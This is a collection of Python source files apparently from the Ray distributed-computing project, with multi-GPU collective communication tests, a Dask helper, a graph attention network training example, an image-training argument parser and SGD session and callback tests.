from ray.util.collective.tests.util import create_collective_multigpu_workers
@pytest.mark.parametrize("group_name", ["default", "test", "123?34!"])
@pytest.mark.parametrize("src_rank", [0, 1])
@pytest.mark.parametrize("src_gpu_index", [0, 1])
def test_broadcast_different_name(
ray_start_distributed_multigpu_2_nodes_4_gpus, group_name, src_rank,
src_gpu_index):
world_size = 2
num_gpu_per_worker = 2
actors, _ = create_collective_multigpu_workers(
num_workers=world_size, group_name=group_name)
ray.get(actors[0].set_buffer.remote([10], value0=2, value1=3))
ray.get(actors[1].set_buffer.remote([10], value0=4, value1=5))
results = ray.get([
a.do_broadcast_multigpu.remote(
group_name=group_name,
src_rank=src_rank,
src_gpu_index=src_gpu_index) for a in actors
])
for i in range(world_size):
for j in range(num_gpu_per_worker):
val = (src_rank + 1) * 2 + src_gpu_index
assert (
results[i][j] == cp.ones([10], dtype=cp.float32) * val).all()
@pytest.mark.parametrize("array_size", [2, 2**5, 2**10, 2**15, 2**20])
@pytest.mark.parametrize("src_rank", [0, 1])
@pytest.mark.parametrize("src_gpu_index", [0, 1])
def test_broadcast_different_array_size(
ray_start_distributed_multigpu_2_nodes_4_gpus, array_size, src_rank,
src_gpu_index):
world_size = 2
num_gpu_per_worker = 2
actors, _ = create_collective_multigpu_workers(world_size)
ray.get(actors[0].set_buffer.remote([array_size], value0=2, value1=3))
ray.get(actors[1].set_buffer.remote([array_size], value0=4, value1=5))
results = ray.get([
a.do_broadcast_multigpu.remote(
src_rank=src_rank, src_gpu_index=src_gpu_index) for a in actors
])
for i in range(world_size):
for j in range(num_gpu_per_worker):
val = (src_rank + 1) * 2 + src_gpu_index
assert (results[i][j] == cp.ones(
(array_size, ), dtype=cp.float32) * val).all()
@pytest.mark.parametrize("src_rank", [0, 1])
@pytest.mark.parametrize("src_gpu_index", [0, 1])
def test_broadcast_torch_cupy(ray_start_distributed_multigpu_2_nodes_4_gpus,
src_rank, src_gpu_index):
import torch
world_size = 2
num_gpu_per_worker = 2
actors, _ = create_collective_multigpu_workers(world_size)
ray.get(actors[0].set_buffer.remote([10], value0=2, value1=3))
ray.get(actors[1].set_buffer.remote(
[10], value0=4, value1=5, tensor_type0="torch", tensor_type1="torch"))
results = ray.get([
a.do_broadcast_multigpu.remote(
src_rank=src_rank, src_gpu_index=src_gpu_index) for a in actors
])
for i in range(world_size):
for j in range(num_gpu_per_worker):
val = (src_rank + 1) * 2 + src_gpu_index
if i == 0:
assert (results[i][j] == cp.ones([10], dtype=cp.float32) *
val).all()
else:
assert (results[i][j] == torch.ones([10]).cuda(j) * val).all()
@pytest.mark.parametrize("src_rank", [3, 4])
@pytest.mark.parametrize("src_gpu_index", [2, 3])
def test_broadcast_invalid_rank(ray_start_distributed_multigpu_2_nodes_4_gpus,
src_rank, src_gpu_index):
world_size = 2
actors, _ = create_collective_multigpu_workers(world_size)
with pytest.raises(ValueError):
_ = ray.get([
a.do_broadcast_multigpu.remote(
src_rank=src_rank, src_gpu_index=src_gpu_index) for a in actors
])
```
#### File: tests/distributed_multigpu_tests/test_distributed_multigpu_reducescatter.py
```python
import pytest
import ray
import cupy as cp
import torch
from ray.util.collective.tests.util import \
create_collective_multigpu_workers, \
init_tensors_for_gather_scatter_multigpu
@pytest.mark.parametrize("tensor_backend", ["cupy", "torch"])
@pytest.mark.parametrize("array_size",
[2, 2**5, 2**10, 2**15, 2**20, [2, 2], [5, 5, 5]])
def test_reducescatter_different_array_size(
ray_start_distributed_multigpu_2_nodes_4_gpus, array_size,
tensor_backend):
world_size = 2
num_gpu_per_worker = 2
actual_world_size = world_size * num_gpu_per_worker
actors, _ = create_collective_multigpu_workers(world_size)
init_tensors_for_gather_scatter_multigpu(
actors, array_size=array_size, tensor_backend=tensor_backend)
results = ray.get([a.do_reducescatter_multigpu.remote() for a in actors])
for i in range(world_size):
for j in range(num_gpu_per_worker):
if tensor_backend == "cupy":
assert (results[i][j] == cp.ones(array_size, dtype=cp.float32)
* actual_world_size).all()
else:
assert (results[i][j] == torch.ones(
array_size, dtype=torch.float32).cuda(j) *
actual_world_size).all()
def test_reducescatter_torch_cupy(
ray_start_distributed_multigpu_2_nodes_4_gpus):
world_size = 2
num_gpu_per_worker = 2
actual_world_size = world_size * num_gpu_per_worker
shape = [10, 10]
actors, _ = create_collective_multigpu_workers(world_size)
# tensor is pytorch, list is cupy
for i, a in enumerate(actors):
ray.get([
a.set_buffer.remote(
shape, tensor_type0="torch", tensor_type1="torch")
])
ray.get([
a.set_list_buffer.remote(
shape, tensor_type0="cupy", tensor_type1="cupy")
])
results = ray.get([a.do_reducescatter_multigpu.remote() for a in actors])
for i in range(world_size):
for j in range(num_gpu_per_worker):
assert (results[i][j] == torch.ones(
shape, dtype=torch.float32).cuda(j) * actual_world_size).all()
# tensor is cupy, list is pytorch
for i, a in enumerate(actors):
ray.get([
a.set_buffer.remote(
shape, tensor_type0="cupy", tensor_type1="cupy")
])
ray.get([
a.set_list_buffer.remote(
shape, tensor_type0="torch", tensor_type1="torch")
])
results = ray.get([a.do_reducescatter_multigpu.remote() for a in actors])
for i in range(world_size):
for j in range(num_gpu_per_worker):
assert (results[i][j] == cp.ones(shape, dtype=cp.float32) *
actual_world_size).all()
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", "-x", __file__]))
```
#### File: util/dask/common.py
```python
from collections import OrderedDict
from collections.abc import Iterator
from operator import getitem
import uuid
import ray
from dask.base import quote
from dask.core import get as get_sync
from dask.utils import apply
try:
from dataclasses import is_dataclass, fields as dataclass_fields
except ImportError:
# Python < 3.7
def is_dataclass(x):
return False
def dataclass_fields(x):
return []
def unpack_object_refs(*args):
"""
Extract Ray object refs from a set of potentially arbitrarily nested
Python objects.
Intended use is to find all Ray object references in a set of (possibly
nested) Python objects, do something to them (get(), wait(), etc.), then
repackage them into equivalent Python objects.
Args:
*args: One or more (potentially nested) Python objects that contain
Ray object references.
Returns:
A 2-tuple of a flat list of all contained Ray object references, and a
function that, when given the corresponding flat list of concrete
values, will return a set of Python objects equivalent to that which
was given in *args, but with all Ray object references replaced with
their corresponding concrete values.
"""
object_refs = []
repack_dsk = {}
object_refs_token = uuid.uuid4().hex
def _unpack(expr):
if isinstance(expr, ray.ObjectRef):
token = expr.hex()
repack_dsk[token] = (getitem, object_refs_token, len(object_refs))
object_refs.append(expr)
return token
token = uuid.uuid4().hex
# Treat iterators like lists
typ = list if isinstance(expr, Iterator) else type(expr)
if typ in (list, tuple, set):
repack_task = (typ, [_unpack(i) for i in expr])
elif typ in (dict, OrderedDict):
repack_task = (typ,
[[_unpack(k), _unpack(v)] for k, v in expr.items()])
elif is_dataclass(expr):
repack_task = (
apply,
typ,
(),
(
dict,
[[f.name, _unpack(getattr(expr, f.name))]
for f in dataclass_fields(expr)],
),
)
else:
return expr
repack_dsk[token] = repack_task
return token
out = uuid.uuid4().hex
repack_dsk[out] = (tuple, [_unpack(i) for i in args])
def repack(results):
dsk = repack_dsk.copy()
dsk[object_refs_token] = quote(results)
return get_sync(dsk, out)
return object_refs, repack
```
#### File: examples/deep_graph/gat_dgl.py
```python
import os
import time
import numpy as np
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import ray
from ray.util.sgd import TorchTrainer
from ray.util.sgd.utils import AverageMeterCollection
from ray.util.sgd.torch import TrainingOperator
import dgl
from dgl.data import RedditDataset
from dgl.nn.pytorch import GATConv
from torch.utils.data import DataLoader
from dgl.dataloading import NodeCollator
print("Current Path: " + os.getcwd())
torch.manual_seed(42)
# define the model class
class GAT(nn.Module):
def __init__(self, in_feats, n_hidden, n_classes, n_layers, n_heads,
activation, feat_drop, attn_drop, negative_slope, residual):
super().__init__()
self.n_layers = n_layers
self.activation = activation
self.n_hidden = n_hidden
self.n_heads = n_heads
self.n_classes = n_classes
self.convs = nn.ModuleList()
# input layer
self.convs.append(
GATConv((in_feats, in_feats), n_hidden, n_heads, feat_drop,
attn_drop, negative_slope, residual, self.activation))
# hidden layer
for _ in range(1, n_layers - 1):
# due to multi-head, the in_dim = num_hidden * num_heads
self.convs.append(
GATConv((n_hidden * n_heads, n_hidden * n_heads), n_hidden,
n_heads, feat_drop, attn_drop, negative_slope,
residual, self.activation))
# output layer
self.convs.append(
GATConv((n_hidden * n_heads, n_hidden * n_heads), n_classes,
n_heads, feat_drop, attn_drop, negative_slope, residual,
None))
def forward(self, blocks, x):
h = x
for i, (layer, block) in enumerate(zip(self.convs, blocks)):
h_dst = h[:block.number_of_dst_nodes()]
if i != len(self.convs) - 1:
h = layer(block, (h, h_dst)).flatten(1)
h = F.dropout(h, p=0.5, training=self.training)
else:
h = layer(block, (h, h_dst))
h = h.mean(1)
return h.log_softmax(dim=-1)
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (torch.argmax(pred, dim=1) == labels).float().sum() / len(pred)
class CustomTrainingOperator(TrainingOperator):
def setup(self, config):
# load reddit data
data = RedditDataset()
g = data[0]
g.ndata["features"] = g.ndata["feat"]
g.ndata["labels"] = g.ndata["label"]
self.in_feats = g.ndata["features"].shape[1]
self.n_classes = data.num_classes
# add self loop,
g = dgl.remove_self_loop(g)
g = dgl.add_self_loop(g)
# Create csr/coo/csc formats before launching training processes
g.create_formats_()
self.g = g
train_nid = torch.nonzero(g.ndata["train_mask"], as_tuple=True)[0]
val_nid = torch.nonzero(g.ndata["val_mask"], as_tuple=True)[0]
test_nid = torch.nonzero(g.ndata["test_mask"], as_tuple=True)[0]
self.train_nid = train_nid
self.val_nid = val_nid
self.test_nid = test_nid
# Create sampler
sampler = dgl.dataloading.MultiLayerNeighborSampler(
[int(fanout) for fanout in config["fan_out"].split(",")])
# Create PyTorch DataLoader for constructing blocks
collator = NodeCollator(g, train_nid, sampler)
train_dataloader = DataLoader(
collator.dataset,
collate_fn=collator.collate,
batch_size=config["batch_size"],
shuffle=False,
drop_last=False,
num_workers=config["sampling_num_workers"])
# Define model and optimizer, residual is set to True
model = GAT(self.in_feats, config["n_hidden"], self.n_classes,
config["n_layers"], config["n_heads"], F.elu,
config["feat_drop"], config["attn_drop"],
config["negative_slope"], True)
self.convs = model.convs
# Define optimizer.
optimizer = torch.optim.Adam(model.parameters(), lr=config["lr"])
# Register model, optimizer, and loss.
self.model, self.optimizer = self.register(
models=model, optimizers=optimizer)
# Register data loaders.
self.register_data(train_loader=train_dataloader)
def train_epoch(self, iterator, info):
meter_collection = AverageMeterCollection()
iter_tput = []
model = self.model
# for batch_idx,batch in enumerate(iterator):
for step, (input_nodes, seeds, blocks) in enumerate(iterator):
tic_step = time.time()
# do some train
optimizer = self.optimizer
device = 0
if self.use_gpu:
blocks = [block.int().to(device) for block in blocks]
batch_inputs = blocks[0].srcdata["features"]
batch_labels = blocks[-1].dstdata["labels"]
batch_pred = model(blocks, batch_inputs)
loss = F.nll_loss(batch_pred, batch_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
iter_tput.append(len(seeds) / (time.time() - tic_step))
if step % 20 == 0:
acc = compute_acc(batch_pred, batch_labels)
gpu_mem_alloc = torch.cuda.max_memory_allocated(
) / 1000000 if torch.cuda.is_available() else 0
print("Epoch {:05d} | Step {:05d} | Loss {:.4f} | "
"Train Acc {:.4f} | Speed (samples/sec) {:.4f} | GPU "
"{:.1f} MB".format(info["epoch_idx"] + 1, step,
loss.item(), acc.item(),
np.mean(iter_tput[3:]),
gpu_mem_alloc))
status = meter_collection.summary()
return status
def validate(self, validation_loader, info):
meter_collection = AverageMeterCollection()
model = self.model
n_layers = self.config["n_layers"]
n_hidden = self.config["n_hidden"]
n_heads = self.config["n_heads"]
batch_size = self.config["batch_size"]
num_workers = self.config["sampling_num_workers"]
g = self.g
train_nid = self.train_nid
val_nid = self.val_nid
test_nid = self.test_nid
device = 0
model.eval()
with torch.no_grad():
x = g.ndata["features"]
for i, layer in enumerate(self.convs):
if i < n_layers - 1:
y = torch.zeros(
g.number_of_nodes(), n_hidden * n_heads
if i != len(self.convs) - 1 else self.n_classes)
else:
y = torch.zeros(
g.number_of_nodes(), n_hidden
if i != len(self.convs) - 1 else self.n_classes)
sampler = dgl.dataloading.MultiLayerFullNeighborSampler(1)
collator = NodeCollator(g, torch.arange(g.number_of_nodes()),
sampler)
dataloader = DataLoader(
collator.dataset,
collate_fn=collator.collate,
batch_size=batch_size,
shuffle=False,
drop_last=False,
num_workers=num_workers)
for input_nodes, output_nodes, blocks in dataloader:
block = blocks[0]
# print("block:",block)
block = block.int().to(device)
h = x[input_nodes].to(device)
h_dst = x[output_nodes].to(device)
if i != len(self.convs) - 1:
h = layer(block, (h, h_dst)).flatten(1)
else:
h = layer(block, (h, h_dst)).mean(1)
h = h.log_softmax(dim=-1)
y[output_nodes] = h.cpu()
x = y
pred = y
labels = g.ndata["labels"]
_, val_acc, test_acc = compute_acc(pred[train_nid], labels[
train_nid]), compute_acc(pred[val_nid], labels[val_nid]), \
compute_acc(pred[test_nid], labels[test_nid])
metrics = {
"num_samples": pred.size(0),
"val_acc": val_acc.item(),
"test_acc": test_acc.item()
}
meter_collection.update(metrics, n=metrics.pop("num_samples", 1))
status = meter_collection.summary()
return status
def run(num_workers, use_gpu, num_epochs, lr, batch_size, n_hidden, n_layers,
n_heads, fan_out, feat_drop, attn_drop, negative_slope,
sampling_num_workers):
trainer = TorchTrainer(
training_operator_cls=CustomTrainingOperator,
num_workers=num_workers,
use_gpu=use_gpu,
backend="nccl",
config={
"lr": lr,
"batch_size": batch_size,
"n_hidden": n_hidden,
"n_layers": n_layers,
"n_heads": n_heads,
"fan_out": fan_out,
"feat_drop": feat_drop,
"attn_drop": attn_drop,
"negative_slope": negative_slope,
"sampling_num_workers": sampling_num_workers
})
for i in range(num_epochs):
trainer.train()
validation_results = trainer.validate()
trainer.shutdown()
print(validation_results)
print("success!")
# Use ray.init(address="auto") if running on a Ray cluster.
if __name__ == "__main__":
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument("--num-workers", type=int, default=2)
argparser.add_argument("--use-gpu", type=bool, default=True)
argparser.add_argument("--num-epochs", type=int, default=2)
argparser.add_argument("--lr", type=float, default=0.001)
argparser.add_argument("--batch-size", type=int, default=1024)
argparser.add_argument("--n-hidden", type=int, default=128)
argparser.add_argument("--n-layers", type=int, default=2)
argparser.add_argument("--n-heads", type=int, default=4)
argparser.add_argument("--fan-out", type=str, default="10,25")
argparser.add_argument("--feat-drop", type=float, default=0.)
argparser.add_argument("--attn-drop", type=float, default=0.)
argparser.add_argument("--negative-slope", type=float, default=0.2)
argparser.add_argument(
"--sampling-num-workers",
type=int,
default=0,
help="Number of sampling processes. Use 0 for no extra process.")
argparser.add_argument(
"--address",
required=False,
type=str,
help="The address to use for ray")
args = argparser.parse_args()
ray.init(address=args.address)
run(num_workers=args.num_workers,
use_gpu=args.use_gpu,
num_epochs=args.num_epochs,
lr=args.lr,
batch_size=args.batch_size,
n_hidden=args.n_hidden,
n_layers=args.n_layers,
n_heads=args.n_heads,
fan_out=args.fan_out,
feat_drop=args.feat_drop,
attn_drop=args.attn_drop,
negative_slope=args.negative_slope,
sampling_num_workers=args.sampling_num_workers)
```
#### File: examples/image_models/args.py
```python
import logging
import argparse
import yaml
config_parser = parser = argparse.ArgumentParser(
description="Training Config", add_help=False)
parser.add_argument(
"-c",
"--config",
default="",
type=str,
metavar="FILE",
help="YAML config file specifying default arguments")
parser = argparse.ArgumentParser(description="PyTorch ImageNet Training")
# Dataset / Model parameters
parser.add_argument("data_dir", metavar="DIR", help="path to dataset")
parser.add_argument(
"--dataset",
"-d",
metavar="NAME",
default="",
help="dataset type (default: ImageFolder/ImageTar if empty)")
parser.add_argument(
"--train-split",
metavar="NAME",
default="train",
help="dataset train split (default: train)")
parser.add_argument(
"--val-split",
metavar="NAME",
default="validation",
help="dataset validation split (default: validation)")
parser.add_argument(
"--model",
default="resnet101",
type=str,
metavar="MODEL",
help="Name of model to train (default: 'countception'")
parser.add_argument(
"--pretrained",
action="store_true",
default=False,
help="Start with pretrained version of specified network (if avail)")
parser.add_argument(
"--initial-checkpoint",
default="",
type=str,
metavar="PATH",
help="Initialize model from this checkpoint (default: none)")
parser.add_argument(
"--resume",
default="",
type=str,
metavar="PATH",
help="Resume full model and optimizer state from checkpoint "
"(default: none)")
parser.add_argument(
"--no-resume-opt",
action="store_true",
default=False,
help="prevent resume of optimizer state when resuming model")
parser.add_argument(
"--num-classes",
type=int,
default=1000,
metavar="N",
help="number of label classes (default: 1000)")
parser.add_argument(
"--gp",
default="avg",
type=str,
metavar="POOL",
help=("Type of global pool, 'avg', 'max', 'avgmax', 'avgmaxc' "
"(default: 'avg')"))
parser.add_argument(
"--img-size",
type=int,
default=None,
metavar="N",
help="Image patch size (default: None => model default)")
parser.add_argument(
"--crop-pct",
default=None,
type=float,
metavar="N",
help="Input image center crop percent (for validation only)")
parser.add_argument(
"--mean",
type=float,
nargs="+",
default=None,
metavar="MEAN",
help="Override mean pixel value of dataset")
parser.add_argument(
"--std",
type=float,
nargs="+",
default=None,
metavar="STD",
help="Override std deviation of of dataset")
parser.add_argument(
"--interpolation",
default="",
type=str,
metavar="NAME",
help="Image resize interpolation type (overrides model)")
parser.add_argument(
"-b",
"--batch-size",
type=int,
default=32,
metavar="N",
help="input batch size for training (default: 32)")
parser.add_argument(
"-vb",
"--validation-batch-size-multiplier",
type=int,
default=1,
metavar="N",
help="ratio of validation batch size to training batch size (default: 1)")
parser.add_argument(
"--drop",
type=float,
default=0.0,
metavar="PCT",
help="Dropout rate (default: 0.)")
parser.add_argument(
"--drop-connect",
type=float,
default=None,
metavar="PCT",
help="Drop connect rate, DEPRECATED, use drop-path (default: None)")
parser.add_argument(
"--drop-path",
type=float,
default=None,
metavar="PCT",
help="Drop path rate (default: None)")
parser.add_argument(
"--drop-block",
type=float,
default=None,
metavar="PCT",
help="Drop block rate (default: None)")
parser.add_argument(
"--jsd",
action="store_true",
default=False,
help="Enable Jensen-Shannon Divergence + CE loss. Use with `--aug-splits`."
)
# Optimizer parameters
parser.add_argument(
"--opt",
default="sgd",
type=str,
metavar="OPTIMIZER",
help="Optimizer (default: 'sgd'")
parser.add_argument(
"--opt-eps",
default=1e-8,
type=float,
metavar="EPSILON",
help="Optimizer Epsilon (default: 1e-8)")
parser.add_argument(
"--momentum",
type=float,
default=0.9,
metavar="M",
help="SGD momentum (default: 0.9)")
parser.add_argument(
"--weight-decay",
type=float,
default=0.0001,
help="weight decay (default: 0.0001)")
# Learning rate schedule parameters
parser.add_argument(
"--sched",
default="step",
type=str,
metavar="SCHEDULER",
help="LR scheduler (default: 'step'")
parser.add_argument(
"--lr",
type=float,
default=0.01,
metavar="LR",
help="learning rate (default: 0.01)")
parser.add_argument(
"--lr-noise",
type=float,
nargs="+",
default=None,
metavar="pct, pct",
help="learning rate noise on/off epoch percentages")
parser.add_argument(
"--lr-noise-pct",
type=float,
default=0.67,
metavar="PERCENT",
help="learning rate noise limit percent (default: 0.67)")
parser.add_argument(
"--lr-noise-std",
type=float,
default=1.0,
metavar="STDDEV",
help="learning rate noise std-dev (default: 1.0)")
parser.add_argument(
"--warmup-lr",
type=float,
default=0.0001,
metavar="LR",
help="warmup learning rate (default: 0.0001)")
parser.add_argument(
"--min-lr",
type=float,
default=1e-5,
metavar="LR",
help="lower lr bound for cyclic schedulers that hit 0 (1e-5)")
parser.add_argument(
"--epochs",
type=int,
default=200,
metavar="N",
help="number of epochs to train (default: 2)")
parser.add_argument(
"--start-epoch",
default=None,
type=int,
metavar="N",
help="manual epoch number (useful on restarts)")
parser.add_argument(
"--decay-epochs",
type=float,
default=30,
metavar="N",
help="epoch interval to decay LR")
parser.add_argument(
"--warmup-epochs",
type=int,
default=3,
metavar="N",
help="epochs to warmup LR, if scheduler supports")
parser.add_argument(
"--cooldown-epochs",
type=int,
default=10,
metavar="N",
help="epochs to cooldown LR at min_lr, after cyclic schedule ends")
parser.add_argument(
"--patience-epochs",
type=int,
default=10,
metavar="N",
help="patience epochs for Plateau LR scheduler (default: 10")
parser.add_argument(
"--decay-rate",
"--dr",
type=float,
default=0.1,
metavar="RATE",
help="LR decay rate (default: 0.1)")
# Augmentation parameters
parser.add_argument(
"--color-jitter",
type=float,
default=0.4,
metavar="PCT",
help="Color jitter factor (default: 0.4)")
parser.add_argument(
"--aa",
type=str,
default=None,
metavar="NAME",
help="Use AutoAugment policy. 'v0' or 'original'. (default: None)"),
# parser.add_argument(
# "--aug-splits",
# type=int,
# default=0,
# help="Number of augmentation splits (default: 0, valid: 0 or >=2)")
parser.add_argument(
"--reprob",
type=float,
default=0.,
metavar="PCT",
help="Random erase prob (default: 0.)")
parser.add_argument(
"--remode",
type=str,
default="const",
help="Random erase mode (default: 'const')")
parser.add_argument(
"--recount", type=int, default=1, help="Random erase count (default: 1)")
parser.add_argument(
"--resplit",
action="store_true",
default=False,
help="Do not random erase first (clean) augmentation split")
parser.add_argument(
"--mixup",
type=float,
default=0.0,
help="mixup alpha, mixup enabled if > 0. (default: 0.)")
parser.add_argument(
"--mixup-off-epoch",
default=0,
type=int,
metavar="N",
help="turn off mixup after this epoch, disabled if 0 (default: 0)")
parser.add_argument(
"--smoothing",
type=float,
default=0.1,
help="label smoothing (default: 0.1)")
parser.add_argument(
"--train-interpolation",
type=str,
default="random",
help="Training interpolation (random, bilinear, bicubic default: 'random')"
)
# Batch norm parameters
# (only works with gen_efficientnet based models currently)
parser.add_argument(
"--bn-tf",
action="store_true",
default=False,
help="Use Tensorflow BatchNorm defaults for models that support it "
"(default: False)")
parser.add_argument(
"--bn-momentum",
type=float,
default=None,
help="BatchNorm momentum override (if not None)")
parser.add_argument(
"--bn-eps",
type=float,
default=None,
help="BatchNorm epsilon override (if not None)")
parser.add_argument(
"--sync-bn",
action="store_true",
help="Enable NVIDIA Apex or Torch synchronized BatchNorm.")
parser.add_argument(
"--dist-bn",
type=str,
default="",
help=("Distribute BatchNorm stats between nodes after each epoch "
"('broadcast', 'reduce', or '')"))
# parser.add_argument(
# "--split-bn",
# action="store_true",
# help="Enable separate BN layers per augmentation split.")
# Model Exponential Moving Average
parser.add_argument(
"--model-ema",
action="store_true",
default=False,
help="Enable tracking moving average of model weights")
parser.add_argument(
"--model-ema-force-cpu",
action="store_true",
default=False,
help="Force ema to be tracked on CPU, rank=0 node only. "
"Disables EMA validation.")
parser.add_argument(
"--model-ema-decay",
type=float,
default=0.9998,
help="decay factor for model weights moving average (default: 0.9998)")
# Misc
parser.add_argument(
"--seed",
type=int,
default=42,
metavar="S",
help="random seed (default: 42)")
parser.add_argument(
"--log-interval",
type=int,
default=50,
metavar="N",
help="how many batches to wait before logging training status")
parser.add_argument(
"--recovery-interval",
type=int,
default=0,
metavar="N",
help="how many batches to wait before writing recovery checkpoint")
parser.add_argument(
"--no-gpu",
action="store_true",
default=False,
help="do not use a GPU even if available")
parser.add_argument(
"--save-images",
action="store_true",
default=False,
help="save images of input bathes every log interval for debugging")
parser.add_argument(
"--amp",
action="store_true",
default=False,
help="use NVIDIA amp for mixed precision training")
parser.add_argument(
"--pin-mem",
action="store_true",
default=False,
help="Pin CPU memory in DataLoader for more efficient (sometimes) "
"transfer to GPU.")
parser.add_argument(
"--no-prefetcher",
action="store_true",
default=False,
help="disable fast prefetcher")
parser.add_argument(
"--output",
default="",
type=str,
metavar="PATH",
help="path to output folder (default: none, current dir)")
parser.add_argument(
"--eval-metric",
default="prec1",
type=str,
metavar="EVAL_METRIC",
help="Best metric (default: 'prec1'")
parser.add_argument(
"--tta",
type=int,
default=0,
metavar="N",
help="Test/inference time augmentation (oversampling) factor. 0=None "
"(default: 0)")
parser.add_argument("--local_rank", default=0, type=int)
# ray
parser.add_argument(
"--ray-address", metavar="ADDR", help="Ray cluster address.")
parser.add_argument(
"-n",
"--ray-num-workers",
type=int,
default=1,
metavar="N",
help="Number of Ray replicas to use. [default=1]")
parser.add_argument(
"--mock-data",
action="store_true",
default=False,
help="Use mocked data for testing. [default=False]")
parser.add_argument(
"--smoke-test",
action="store_true",
default=False,
help="Only run one step for testing. [default=False]")
def parse_args():
# Do we have a config file to parse?
args_config, remaining = config_parser.parse_known_args()
if args_config.config:
with open(args_config.config, "r") as f:
cfg = yaml.safe_load(f)
parser.set_defaults(**cfg)
# The main arg parser parses the rest of the args, the usual
# defaults will have been overridden if config file specified.
args = parser.parse_args(remaining)
# Cache the args as a text string to save them in the output dir later
args_text = yaml.safe_dump(args.__dict__, default_flow_style=False)
# Arguments pre-processing from the original train.py
args.prefetcher = not args.no_prefetcher
args.distributed = False # ray SGD handles this (DistributedSampler)
args.device = "cuda" # ray should handle this
if args.no_gpu and args.prefetcher:
logging.warning("Prefetcher needs CUDA currently "
"(might be a bug in timm). "
"Disabling it.")
args.prefetcher = False
# assert args.aug_splits == 0 or args.aug_splits > 1, (
# "Split must be 0 or 2+")
# args.num_aug_splits = args.aug_splits
args.num_aug_splits = 0 # todo:
args.split_bn = False # todo:
return args, args_text
```
#### File: v2/tests/test_callbacks.py
```python
import pytest
import os
import shutil
import tempfile
import json
import ray
import ray.util.sgd.v2 as sgd
from ray.util.sgd.v2 import Trainer
from ray.util.sgd.v2.constants import (
TRAINING_ITERATION, DETAILED_AUTOFILLED_KEYS, BASIC_AUTOFILLED_KEYS,
ENABLE_DETAILED_AUTOFILLED_METRICS_ENV)
from ray.util.sgd.v2.callbacks import JsonLoggerCallback
from ray.util.sgd.v2.backends.backend import BackendConfig, BackendInterface
from ray.util.sgd.v2.worker_group import WorkerGroup
@pytest.fixture
def ray_start_4_cpus():
address_info = ray.init(num_cpus=4)
yield address_info
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def make_temp_dir():
tmpdir = str(tempfile.mkdtemp())
yield tmpdir
# The code after the yield will run as teardown code.
if os.path.exists(tmpdir):
shutil.rmtree(tmpdir)
class TestConfig(BackendConfig):
@property
def backend_cls(self):
return TestBackend
class TestBackend(BackendInterface):
def on_start(self, worker_group: WorkerGroup, backend_config: TestConfig):
pass
def on_shutdown(self, worker_group: WorkerGroup,
backend_config: TestConfig):
pass
@pytest.mark.parametrize("workers_to_log", [0, None, [0, 1]])
@pytest.mark.parametrize("detailed", [False, True])
@pytest.mark.parametrize("filename", [None, "my_own_filename.json"])
def test_json(ray_start_4_cpus, make_temp_dir, workers_to_log, detailed,
filename):
if detailed:
os.environ[ENABLE_DETAILED_AUTOFILLED_METRICS_ENV] = "1"
else:
os.environ.pop(ENABLE_DETAILED_AUTOFILLED_METRICS_ENV, 0)
config = TestConfig()
num_iters = 5
num_workers = 4
if workers_to_log is None:
num_workers_to_log = num_workers
elif isinstance(workers_to_log, int):
num_workers_to_log = 1
else:
num_workers_to_log = len(workers_to_log)
def train_func():
for i in range(num_iters):
sgd.report(index=i)
return 1
if filename is None:
# if None, use default value
callback = JsonLoggerCallback(
make_temp_dir, workers_to_log=workers_to_log)
assert str(
callback.log_path.name) == JsonLoggerCallback._default_filename
else:
callback = JsonLoggerCallback(
make_temp_dir, filename=filename, workers_to_log=workers_to_log)
assert str(callback.log_path.name) == filename
trainer = Trainer(config, num_workers=num_workers)
trainer.start()
trainer.run(train_func, callbacks=[callback])
with open(callback.log_path, "r") as f:
log = json.load(f)
print(log)
assert len(log) == num_iters
assert len(log[0]) == num_workers_to_log
assert all(len(element) == len(log[0]) for element in log)
assert all(
all(worker["index"] == worker[TRAINING_ITERATION] - 1
for worker in element) for element in log)
assert all(
all(
all(key in worker for key in BASIC_AUTOFILLED_KEYS)
for worker in element) for element in log)
if detailed:
assert all(
all(
all(key in worker for key in DETAILED_AUTOFILLED_KEYS)
for worker in element) for element in log)
else:
assert all(
all(not any(key in worker for key in DETAILED_AUTOFILLED_KEYS)
for worker in element) for element in log)
```
#### File: v2/tests/test_session.py
```python
import time
import pytest
from ray.util.sgd.v2.session import init_session, shutdown_session, \
get_session, world_rank, report
@pytest.fixture(scope="function")
def session():
def f():
return 1
init_session(training_func=f, world_rank=0)
yield get_session()
shutdown_session()
def test_init_fail(session):
with pytest.raises(ValueError):
init_session(lambda: 1, 0)
def test_get_fail(session):
shutdown_session()
with pytest.raises(ValueError):
get_session()
def test_world_rank(session):
assert world_rank() == 0
shutdown_session()
with pytest.raises(ValueError):
world_rank()
def test_train(session):
session.start()
output = session.finish()
assert output == 1
def test_report():
def train():
for i in range(2):
report(loss=i)
init_session(training_func=train, world_rank=0)
session = get_session()
session.start()
assert session.get_next()["loss"] == 0
assert session.get_next()["loss"] == 1
shutdown_session()
with pytest.raises(ValueError):
report(loss=2)
def test_report_fail():
def train():
for i in range(2):
report(i)
return 1
init_session(training_func=train, world_rank=0)
session = get_session()
session.start()
assert session.get_next() is None
with pytest.raises(TypeError):
session.finish()
shutdown_session()
def test_report_after_finish(session):
session.start()
session.finish()
for _ in range(2):
report(loss=1)
assert session.get_next() is None
def test_no_start(session):
with pytest.raises(RuntimeError):
session.get_next()
def test_locking():
"""Tests that report pauses training until fetch_next or finish."""
def train_1():
import _thread
_thread.interrupt_main()
init_session(training_func=train_1, world_rank=0)
session = get_session()
with pytest.raises(KeyboardInterrupt):
session.start()
shutdown_session()
def train_2():
for i in range(2):
report(loss=i)
train_1()
init_session(training_func=train_2, world_rank=0)
session = get_session()
session.start()
time.sleep(3)
with pytest.raises(KeyboardInterrupt):
session.finish()
shutdown_session()
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", "-x", __file__]))
```
#### File: ray/release/alert.py
```python
import argparse
from collections import defaultdict, Counter
from typing import Any, List, Tuple, Mapping, Optional
import datetime
import hashlib
import json
import logging
import os
import requests
import sys
import boto3
from e2e import GLOBAL_CONFIG
from alerts.default import handle_result as default_handle_result
from alerts.rllib_tests import handle_result as rllib_tests_handle_result
